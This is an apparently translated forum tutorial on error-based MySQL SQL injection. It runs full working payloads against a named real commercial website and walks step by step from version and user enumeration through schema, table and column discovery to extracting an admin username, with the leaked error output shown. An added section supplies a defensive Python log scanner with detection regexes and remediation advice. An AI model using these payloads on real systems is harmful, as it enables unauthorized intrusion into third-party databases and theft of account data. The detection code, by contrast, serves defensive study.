I want to teach you SQL injection using the error-based technique.
There are many ways to do error-based injection.
So I'll teach the simple and basic one; you can see it on security/hacking forums and blogs.
Thanks to rozalman, who gave me a website I can use as an example.
Before proceeding, take note: when can we use this technique?
Testing target:
Code:
hxxp://www.radiantwholefood.com.my/content.php?cat=136
Basically, this is what you need to know.
Code:
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,sayahensem,0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
So which part do we need to change to get the result we want?
From here:
((select concat(0x7e,0x27,sayahensem,0x27,0x7e)) from information_schema.tables limit 0,1)
So basically it is the same as the other injection techniques; we only need to change a little.
So to enumerate the user, database and version in use, I do this:
Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,version(),0x3a,user(),0x3a,database(),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
The result:
So to view the database you are interested in, use this:
Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Here you raise LIMIT 0,1 to 1,1 to see the other databases.
I found out that the database I want is:
Code:
Duplicate entry '~'radiant_ezlitev3'~1' for key 1
Hex-encode the name of that database; you will get this:
Code:
0x72616469616e745f657a6c6974657633
To view the table_names that exist in that database:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,table_name,0x27,0x7e) FROM information_schema.tables Where table_schema=0xdb_yang_udah_dihexkan limit 3,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Likewise, as usual you only need to increase the LIMIT number to find the table you want.
Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,table_name,0x27,0x7e) FROM information_schema.tables Where table_schema=0x72616469616e745f657a6c6974657633 limit 3,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
I found the table_name I want, namely:
Code:
Duplicate entry '~'usertb'~1' for key 1
How do you view the column_names in that table_name?
You only need to add this.
Change table_name to column_name and information_schema.tables to information_schema.columns, and add the code below into the injection:
Code:
AND table_name=0xtable_name_yg_dah_dihexkan
So it becomes this:
Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,column_name,0x27,0x7e) FROM information_schema.columns Where table_schema=0x72616469616e745f657a6c6974657633 AND table_name=0x757365727462 limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
The result:
Code:
Duplicate entry '~'UserName'~1' for key 1
I chose the column_name Username. To view its contents I use this:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,table_name.column_name,0x27,0x7e) FROM database_name.table_name LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a
So it becomes this:
Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,usertb.Username,0x27,0x7e) FROM radiant_ezlitev3.usertb LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
The result:
Code:
Duplicate entry '~'admin'~1' for key 1
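A defender-side check for the technique shown in this post, added here as an example (it is not from the original post): it decodes each request's query string from web server access logs and flags the floor(rand(0)*2) / GROUP BY / information_schema / count(*),concat( combination that every payload above relies on, and it extracts what a MySQL duplicate-key error in a response would disclose. The log lines are constructed samples; the IP address and timestamps are made up.

```python
"""Detect the error-based SQL injection pattern above in access logs (added example)."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Signatures of the floor(rand(0)*2) + GROUP BY duplicate-key technique.
SIGNATURES = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)"),
    "group_by": re.compile(r"group\s+by\s+\w+"),
    "info_schema": re.compile(r"information_schema\.(tables|columns|schemata)"),
    "count_concat": re.compile(r"count\s*\(\s*\*\s*\)\s*,\s*concat\s*\("),
}
# The MySQL error the technique depends on to leak data through the page.
LEAK_RE = re.compile(r"Duplicate entry '(.*)' for key")
# Combined log format: client, identd, user, [time], "METHOD path proto", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def scan_request(url):
    """Return the sorted signature names matched by any query parameter."""
    hits = set()
    for _, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        text = unquote_plus(value).lower()            # also undo double-encoding
        text = re.sub(r"/\*.*?\*/|\s+", " ", text)    # /**/ and whitespace -> space
        hits.update(name for name, rx in SIGNATURES.items() if rx.search(text))
    return sorted(hits)

def scan_log(lines):
    """Return (client_ip, path, hits) for requests carrying two or more signatures."""
    flagged = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target, _status = m.groups()
        hits = scan_request(target)
        if len(hits) >= 2:                # a lone "group by" in a search box is noise
            flagged.append((ip, target.split("?")[0], hits))
    return flagged

def leaked_value(body):
    """What a MySQL duplicate-key error in a response body discloses, else None."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None

# Constructed sample log lines (not from the original post); the third request
# carries the version()/user()/database() payload from the tutorial, URL-encoded.
SAMPLE_LOG = [
    '198.51.100.2 - - [10/Oct/2013:13:55:01 +0800] "GET /content.php?cat=136 HTTP/1.1" 200 8192',
    '198.51.100.3 - - [10/Oct/2013:13:55:10 +0800] "GET /search.php?q=group+by+committee HTTP/1.1" 200 4100',
    '203.0.113.7 - - [10/Oct/2013:13:55:36 +0800] "GET /content.php?cat=136%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,version(),0x3a,user(),0x3a,database(),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 5123',
]

if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(f"error-based SQLi attempt from {ip} against {path}: {', '.join(hits)}")
```

The same `leaked_value` check run against outgoing responses (for example in a reverse proxy) catches the condition that makes the technique work at all: the fix on the application side is to use a parameterised query for `cat` and to return a generic error page instead of the raw MySQL error text.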
That's all.
Perhaps you now understand how to use this technique from this tutorial.
Once again, sorry if you don't understand the language I use.